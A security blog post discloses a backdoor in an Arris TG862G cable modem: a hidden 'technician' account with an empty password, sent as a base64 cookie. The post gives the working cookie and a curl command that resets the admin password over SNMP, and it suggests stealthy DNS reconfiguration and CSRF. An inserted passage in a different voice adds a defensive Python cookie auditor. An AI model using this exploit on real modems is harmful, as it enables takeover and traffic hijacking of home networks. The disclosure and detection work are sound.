Friday, June 2, 2023

Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defensible, but flat-out backdoors are always unacceptable. Today's example is brought to you by Arris. A great quote from their site:
"Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability."
Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyway, the following was observed on an Arris TG862G cable modem running firmware version TS070563_092012_MODEL_862_GW.

After successfully providing the correct login and password to the modem's administration page, the following cookie is set (client side):
Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9
All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops); if the cookie is not present the modem replies with "PLEASE LOGIN". The cookie value is just a base64-encoded JSON object:
{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
And after base64 decoding the "credential" value we get:
{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}
Sweet, the device is sending your credentials on every authenticated request (without HTTPS); essentially they have created basic-auth 2.0. As the kids say, "YOLO". The part that stuck out to me is the "technician" value that is set to "false". Swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:
Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9
Which decodes to the following:
{"credential":"dGVjaG5pY2lhbjo="}
And finally:
{"credential":"technician:"}
Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable explanation for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically an HTML/JS wrapper around some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by sending our "technician" credential cookie:

That's neat, but we would much rather be using the fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded Unix admin. Taking a look at the password change functionality appeared to be a dead end, as it requires the previous password to set a new one:

Surprisingly, the application does check the value of the old password too! Back to digging around; the following was observed in the "mib.js" file:
SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);
It appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:
HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55

{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}
What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:
curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'
Of course, if you change the password you wouldn't be very sneaky; a better approach would be re-configuring the modem's DNS settings, perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.
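From a defender's angle, two things in this post are worth catching on the wire: the cookie format (a base64 JSON envelope whose "credential" field is itself base64 of "user:password", with the technician form carrying only that one field and none of the fields the real login issues) and snmpSet requests against the AdminPassword OID from mib.js. The following Python is an added example, not code from the original post or from Arris: it unwraps both base64 layers and audits a request the way a reverse proxy or log-review script in front of the admin interface could, flagging cookies that lack the login-issued fields, the hidden technician user, an empty password, and any snmpSet that names the AdminPassword OID. The two cookie values are the ones quoted above; the request paths, the NEW_VALUE query string and the function names decode_credential_cookie and audit_request are constructed for this example.

```python
import base64
import json
from typing import Any, Dict, List, Optional

# OID of SysCfg.AdminPassword as quoted from the modem's mib.js in the post.
ADMIN_PASSWORD_OID = "1.3.6.1.4.1.4115.1.20.1.1.5.1"

# Keys present in a cookie issued by the real login flow (from the decoded cookie in the post).
LOGIN_ISSUED_FIELDS = {"valid", "technician", "credential", "primaryOnly", "access", "name"}

# Cookie values quoted in the post: a normal admin login and the technician form.
LEGIT_COOKIE = "eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9"
TECH_COOKIE = "eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9"


def _b64decode_lenient(value: str) -> bytes:
    """Decode base64 whether or not the trailing '=' padding survived the cookie jar."""
    return base64.b64decode(value + "=" * (-len(value) % 4))


def decode_credential_cookie(cookie_value: str) -> Dict[str, Any]:
    """Unwrap both layers: outer base64(JSON), inner base64("user:password").

    Returns the outer JSON object under "fields" plus the split user/password;
    password is None when the inner value carries no ':' separator at all.
    """
    fields = json.loads(_b64decode_lenient(cookie_value).decode("utf-8"))
    if not isinstance(fields, dict):
        raise ValueError("outer JSON is not an object")
    inner = _b64decode_lenient(str(fields.get("credential", ""))).decode("utf-8", "replace")
    user, sep, password = inner.partition(":")
    return {"fields": fields, "user": user, "password": password if sep else None}


def audit_request(path: str, query: str, cookie_value: Optional[str]) -> List[str]:
    """Return the findings for one request to the modem's CGI endpoints.

    An empty list means the request looks like ordinary post-login traffic.
    """
    findings: List[str] = []
    if cookie_value is None:
        return ["no credential cookie present (modem should answer PLEASE LOGIN)"]
    try:
        decoded = decode_credential_cookie(cookie_value)
    except ValueError:  # binascii.Error, JSONDecodeError and UnicodeDecodeError all subclass it
        return ["credential cookie is not base64(JSON)"]
    missing = LOGIN_ISSUED_FIELDS - set(decoded["fields"])
    if missing:
        findings.append("cookie lacks login-issued fields: " + ", ".join(sorted(missing)))
    if decoded["user"] == "technician":
        findings.append("hidden technician account in use")
    if decoded["password"] == "":
        findings.append("empty password in credential")
    if path == "/snmpSet" and ADMIN_PASSWORD_OID in query:
        findings.append("snmpSet against the AdminPassword OID")
    return findings


if __name__ == "__main__":
    # Constructed sample traffic; NEW_VALUE is a placeholder, not a real password.
    samples = [
        ("/snmpGet", "oid=" + ADMIN_PASSWORD_OID + ".0", LEGIT_COOKIE),
        ("/snmpSet", "oid=" + ADMIN_PASSWORD_OID + ".0=NEW_VALUE;4;", TECH_COOKIE),
        ("/snmpGet", "oid=" + ADMIN_PASSWORD_OID + ".0", None),
    ]
    for path, query, cookie in samples:
        print(path, query, audit_request(path, query, cookie) or ["ok"])
```

The padding-tolerant decoder matters because the technician cookie in the post is stored without trailing "=" while the inner values keep theirs; a strict decoder would miss the outer layer entirely. The check on missing fields is the most robust of the four, since it flags any hand-built cookie regardless of which username it carries.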

The real pain here is that Arris keeps their FW locked up tightly and only allows cable operators to download revisions/fixes/updates, so you are at the mercy of your cable operator. Even if Arris decides that it's worth the time and effort to patch this backdoor, you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.

